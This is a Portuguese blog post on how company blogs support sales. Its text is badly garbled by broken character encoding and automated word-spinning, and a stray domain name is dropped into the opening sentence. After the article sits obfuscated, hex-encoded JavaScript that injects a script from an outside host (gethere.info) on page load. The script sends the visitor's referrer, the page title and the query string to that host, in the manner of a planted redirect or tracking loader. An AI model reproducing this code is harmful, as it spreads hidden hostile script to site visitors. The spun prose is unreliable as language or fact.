Blog

Blogues E Vendas: Uma Parceria De Empreendimento Perfeito ?

Como lebideryaaksazlar.com o visitante pode supor, uma de principais razA�es pelas quais as companhias consideram estes blogs eficientes como ferramentas de negA?cios A� que elas ajudam a entregar ou promover as vendas. Embora nA?o haja 1 valor quantitativo com relaA�A?o A� influA?ncia monetA?ria exata dos blogues sobre as vendas, existem evidA?ncias do algum gA�nero de retorno sobre o investimento. O aumento nas vendas pode ser e geralmente A� especialmente um dos efeitos indiretos dos blogues de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador usando milhA�es do pessoas (acionistas, parceiros de negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando sobre negA?cios e afins. Actualmente imagine se vocA? pode vir a usar todas as informaA�A�es que o visitante aprendeu para estabelecer este produto ou serviA�o de que seus clientes querem, por que eles querem, tais como eles querem e quanto eles estA?o dispostos a pagar portanto. Isto foi precisamente o que A� especialmente um blogue e bastante mais. Definitivamente, os blogs sA?o bons para as empresas.

Um blogue ou 1 blog foi um sitio interativo de que mantA�m uma crA?nica contA�nua de informaA�A�es. A� um site atualizado regularmente com links para outros artigos ou outros sites. Geralmente, um blogue tende a ter uma A?rea por conteA?do principal com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa usando as ainda mais recentes no topo. Usualmente, esses artigos sA?o organizados em categorias. HA? igualmente um arquivo de artigos baseado em datas. Um blogroll, uma lista por links para outros sitios relacionados A� especialmente outra caracterA�stica de um blog.

Um blog pode reprimir um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que A� atualizado periodicamente. Um leitor de feeds exibe a nova postagem e um link para ela. A maior parte dos blogues tambA�m tem um refugio que permite aos visitantes deixar comentA?rios. Com um blog, vocA? publica novos conteA?dos e seus leitores podem adicionar seus prA?prios comentA?rios com links para seus prA?prios blogs. Elementar de utilizar ferramentas de blogs estA?o disponA�veis, muitas vezes de graA�a. Uma ferramenta bA?sica de blogging fornece uma interface onde vocA? pode funcionar de maneira fA?cil e intuitiva enquanto cuida do restante da logA�stica envolvida em tornar seu blog apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter 1 blog A� uma de A?reas do rA?pido aumento da Internet. De convA�nio com este popular motor de busca Technorati, hA? mais por 40 milhA�es de blogs na Internet hoje em dia e mais blogs estA?o aparecendo na taxa de 75. 000 por dia. Isto A� principalmente devido aos inA?meros benefA�cios do blogs para negA?cios.

Um blog tem uma poderosa habilidade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Agora vocA? tA?m a possibilidade de ter uma presenA�a dominador na Web, nA?o baseada em tamanho, capital ou recursos, porA�m baseada na qualidade do conteA?do, pA?blico-alvo e produtos e serviA�os A?teis. Usando blogs saiba como equalizadores, a blogosfera se tornou um campo do jogo verdadeiramente estimulante para todas as empresas.

Um blog A� uma fonte constante de informaA�A�es valiosas e atualizadas. A criaA�A?o por um blog permite de que vocA? demonstre sua experiA?ncia e se estabeleA�a como um lA�der de ideias em seu setor. Um blogue pode ser seu veA�culo para atualizaA�A�es de produtos ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o de que vocA? queira transmitir ao seu pA?blico-alvo. Um blogue deve atalhar informaA�A�es relevantes, nA?o exclusivamente arremessos de vendas; caso contrA?rio, foi muito menos provA?vel que os leitores retornem. Saiba como acontece usando qualquer parcela de um plano de marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� 1 mA�todo eficiente para se comunicar com clientes e prospects. Ele permite de que vocA? converse abertamente e regularmente usando eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos com eles desde o inA�cio. Um blogue com seu estilo por conversaA�A?o A� especialmente ideal para desenvolver bons relacionamentos usando os clientes. Os leitores sentir-se-A?o espontA?neo consigo bastante antes de telefonarem-lhe para fazer uma adquire ou emanar o seu serviA�o.

Um blog A� uma A?tima ferramenta para conseguir feedback destes leitores. Seus leitores podem possibilitar deixar comentA?rios ou fazer perguntas. Um blog foi uma A?tima maneira de descobrir este que os leitores estA?o pensando e no desenvolvimento fornece idA�ias ou saiba como melhor atendA?-los, melhorando assim o seu negA?cio. Formar decisA�es de negA?cios usando base nos feedbacks dos leitores pode vir a ser 1 dos movimentos mais hA?beis que vocA? pode criar.

No entanto, para ser eficaz, um blog possui que ser atualizado usando freqA?A?ncia. Os leitores nA?o visitam blogs que nA?o apresentam novos conteA?dos regularmente. Manter os leitores informados com postagens periA?dicas a cerca de o seu negA?cio cria buzz e publicidade. Existem trabalho envolvido na criaA�A?o de 1 blog. Leva tempo e compromisso para escrever posts interessantes e informativos. Contudo pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogs e Vendas Em Tandem

As vendas pedem interaA�A?o privada. Um blog A� um desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem usar atravA�s do seu blog de maneira consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para mais conteA?do recente regularmente. Horas extras, vocA? serA? pesado de obter um pA?blico fiel. Os leitores vA?o vA?-lo tais como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� desenvolvido. Seus leitores perceberA?o de que A� menos arriscado comprar de o visitante ou aproveitar seu serviA�o. Se o visitante pode blogar eficientemente sobre o assunto, eles tendem a acreditar que seu produto ou serviA�o valerA? a pena.

Ao blogar, vocA? estA? enviando a mensagem de que alguA�m estA? ouvindo, alguA�m que vocA? pode vir a abordar como pode ser visto a partir do comentA?rios respondidos e novas atualizaA�A�es. Isso farA? com que seus leitores se sintam muito mais seguros e levarA? isso em traA�o, pois eles tomam uma decisA?o por compra. Este blog A� inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e origina familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� vocA? para obter mais informaA�A�es e, se receberem a opA�A?o, desejarA?o adquirir de o visitante. Isso fortalece o relacionamento entre vocA? e seus clientes e eles tambA�m igualmente similarmente identicamente conjuntamente podem enviar outras vendas para vocA?. O ciclo continua. AlA�m disso, um blog A� uma maneira extremamente eficaz para obter um ranking elevado do Search Engine. Em outras palavras, os blogs podem trazer mais leitores e mais compradores em potencial.

Blogar A� especialmente marketing para as pessoas de uma forma menos intrusiva e ofensiva, mais saiba como uma conversa freewheeling em comparaA�A?o com um discurso de vendas irritante. A� especialmente realmente uma boa forma de promover as vendas, ainda de que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}